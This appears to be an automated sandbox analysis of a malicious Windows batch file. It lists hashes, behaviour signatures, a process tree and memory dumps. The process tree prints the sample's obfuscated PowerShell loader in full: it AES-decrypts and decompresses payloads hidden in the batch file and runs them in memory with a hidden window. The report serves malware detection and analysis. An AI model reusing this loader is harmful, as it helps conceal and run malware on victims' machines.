Analysis
max time kernel: 122s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 02-07-2024 14:18
Static task: static1
Behavioral task: behavioral1
Sample: Fanta_Is_Better_Than_Coke.bat
Resource: win7-20240221-en
4 signatures
150 seconds
General
Target: Fanta_Is_Better_Than_Coke.bat
Size: 773KB
MD5: 4dec8ae835e5a08a2a49caed42ec3d03
SHA1: d980406271e2404a1bba3aa0db370cca9f37c284
SHA256: 8d65586e976036fdd9baff1a531782c4dfc03b18e681f7d28a3b971375c08d51
SHA512: 802bf400411973dec2975a0154cea60f0461bd78999a4d1be0b73e786b8a4be803caf0ffc67d0986b98c7bdf8d33ccd6ec16b708a82c3091df61df88706aa224
SSDEEP: 24576:WLYRF4zDL03jn4gzvZnOOGZj1rlUMaM2o2oa:WLMrj3ONpOo8
Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid / process):
    1636  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process):
    Token: SeDebugPrivilege  1636  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description / pid / process / target process):
    PID 2860 wrote to memory of 2284  2860  cmd.exe  cmd.exe
    PID 2860 wrote to memory of 2284  2860  cmd.exe  cmd.exe
    PID 2860 wrote to memory of 2284  2860  cmd.exe  cmd.exe
    PID 2860 wrote to memory of 1636  2860  cmd.exe  powershell.exe
    PID 2860 wrote to memory of 1636  2860  cmd.exe  powershell.exe
    PID 2860 wrote to memory of 1636  2860  cmd.exe  powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat"
  Signatures:
    - Suspicious use of WriteProcessMemory
  Children:
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HJMqH6hNcuL5hS+vmBgSUwLnZDRraZ4uSSHQzk2uV5k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7+Z22IkUOZ2XEDFGjqVWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QqOLA=New-Object System.IO.MemoryStream(,$param_var); $wWAsy=New-Object System.IO.MemoryStream; $bEzcd=New-Object System.IO.Compression.GZipStream($QqOLA, [IO.Compression.CompressionMode]::Decompress); $bEzcd.CopyTo($wWAsy); $bEzcd.Dispose(); $QqOLA.Dispose(); $wWAsy.Dispose(); $wWAsy.ToArray();}function execute_function($param_var,$param2_var){ $KEgbT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $prFBz=$KEgbT.EntryPoint; $prFBz.Invoke($null, $param2_var);}$PYOpj = 'C:\Users\Admin\AppData\Local\Temp\Fanta_Is_Better_Than_Coke.bat';$host.UI.RawUI.WindowTitle = $PYOpj;$cvJhI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($PYOpj).Split([Environment]::NewLine);foreach ($xMZXI in $cvJhI) { if ($xMZXI.StartsWith('QBmdPhNhdFQSpIxMPXIo')) { $FLIWZ=$xMZXI.Substring(20); break; }}$payloads_var=[string[]]$FLIWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads (file / filesize)
- memory/1636-4-0x000007FEF5C2E000-0x000007FEF5C2F000-memory.dmp  4KB
- memory/1636-5-0x000000001B650000-0x000000001B932000-memory.dmp  2.9MB
- memory/1636-8-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB
- memory/1636-9-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB
- memory/1636-7-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB
- memory/1636-11-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB
- memory/1636-10-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB
- memory/1636-6-0x00000000022D0000-0x00000000022D8000-memory.dmp  32KB
- memory/1636-12-0x000007FEF5970000-0x000007FEF630D000-memory.dmp  9.6MB